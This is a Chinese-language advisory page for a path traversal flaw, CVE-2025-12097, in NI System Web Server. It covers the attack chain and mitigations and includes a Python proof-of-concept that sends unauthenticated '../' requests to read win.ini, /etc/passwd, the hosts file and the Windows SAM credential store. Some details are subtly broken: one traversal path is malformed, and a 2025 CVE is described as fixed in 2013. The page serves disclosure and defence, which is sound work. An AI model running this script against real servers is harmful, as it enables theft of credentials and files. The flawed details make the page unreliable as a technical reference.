CVE-2025-12097 | NI System Web Server 相对路径遍历漏洞导致信息泄露

漏洞信息

漏洞编号

CVE-2025-12097

漏洞类型

路径遍历

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

NI System Web Server

漏洞概述

CVE-2025-12097是NI System Web Server中存在的一个相对路径遍历漏洞，该漏洞允许未经认证的远程攻击者通过发送特制的HTTP请求来读取服务器上的任意文件。此漏洞的CVSS评分为7.5，属于高危级别，攻击复杂度低，无需用户交互即可成功利用。攻击者可以利用此漏洞获取服务器上的敏感配置文件、密码文件、系统日志以及其他机密数据，从而进行进一步的攻击活动。该漏洞存在于NI System Web Server 2012及更早版本中，官方已于2013年修复了此问题。对于无法立即升级的用户，建议采取临时缓解措施来降低风险。

技术细节

该漏洞属于经典的相对路径遍历（Path Traversal）漏洞，攻击者通过在HTTP请求中插入特殊的路径序列（如../）来绕过服务器的路径限制，从而访问目标系统上的任意文件。在NI System Web Server中，由于服务器端对用户输入的文件路径缺乏充分的验证和过滤，攻击者可以通过构造类似/../../../../etc/passwd的请求来读取服务器的密码文件或其他敏感文件。成功的利用需要攻击者能够直接访问NI System Web Server的HTTP端口（通常为80或443），然后发送精心构造的请求包。由于该服务默认以较高权限运行，攻击者可能获取系统级的访问权限。漏洞的利用不需要任何认证凭证，攻击者只需知道目标服务器的IP地址即可发起攻击。

攻击链分析

STEP 1

步骤1

信息收集：攻击者扫描目标网络，发现运行NI System Web Server的服务，并识别其版本信息

STEP 2

步骤2

构造恶意请求：攻击者构造包含路径遍历序列（如../）的HTTP请求，尝试访问系统敏感文件

STEP 3

步骤3

发送特制请求：攻击者通过HTTP协议向目标服务器的Web服务端口发送恶意构造的请求

STEP 4

步骤4

服务器解析：服务器接收到请求后，未正确验证路径中的遍历字符，直接访问攻击者指定的文件路径

STEP 5

步骤5

信息泄露：服务器将目标文件内容作为HTTP响应返回给攻击者，攻击者成功获取敏感信息

STEP 6

步骤6

横向移动：攻击者利用获取的敏感信息（如密码文件、配置文件）进行进一步的攻击和权限提升

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-12097 PoC - Path Traversal in NI System Web Server
# Target: NI System Web Server 2012 and prior versions

def exploit_ni_webserver(target_ip, target_port=80):
    """
    Exploit for CVE-2025-12097: Relative Path Traversal in NI System Web Server
    This PoC demonstrates how an attacker can read arbitrary files from the server.
    """
    
    # Common sensitive files to target
    files_to_read = [
        '../../../../windows/win.ini',
        '../../../../etc/passwd',
        '../../../../windows/system32/drivers/etc/hosts',
        '../../../windows/repairSAM'
    ]
    
    for file_path in files_to_read:
        try:
            # Construct the malicious URL
            url = f'http://{target_ip}:{target_port}/'
            
            # Send path traversal payload
            headers = {
                'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)',
                'Accept': '*/*'
            }
            
            # Try to read file through path traversal
            response = requests.get(url + file_path, headers=headers, timeout=10)
            
            if response.status_code == 200 and len(response.content) > 0:
                print(f'[+] Success! File: {file_path}')
                print(f'[+] Content preview:')
                print(response.text[:500])
                print('-' * 50)
                return True
                
        except requests.exceptions.RequestException as e:
            print(f'[-] Error accessing {file_path}: {e}')
    
    return False

if __name__ == '__main__':
    # Example usage
    target = '192.168.1.100'
    port = 80
    
    print(f'Testing NI System Web Server at {target}:{port}')
    print('=' * 50)
    
    exploit_ni_webserver(target, port)

影响范围

NI System Web Server 2012

NI System Web Server 2012 SP1

NI System Web Server 2011

NI System Web Server 2010

NI System Web Server 所有2013年前版本

防御指南

临时缓解措施

如果无法立即升级到修复版本，可以采取以下临时缓解措施：1）使用网络层访问控制，限制对NI System Web Server端口的访问，仅允许受信任的IP地址访问；2）部署反向代理或Web应用防火墙，对包含路径遍历特征字符（如../、..\）的请求进行拦截和过滤；3）监控Web服务器日志，关注异常的路径遍历请求模式；4）考虑暂时禁用不必要的Web服务功能，减少攻击面；5）实施网络隔离，将Web服务器部署在独立的隔离区段。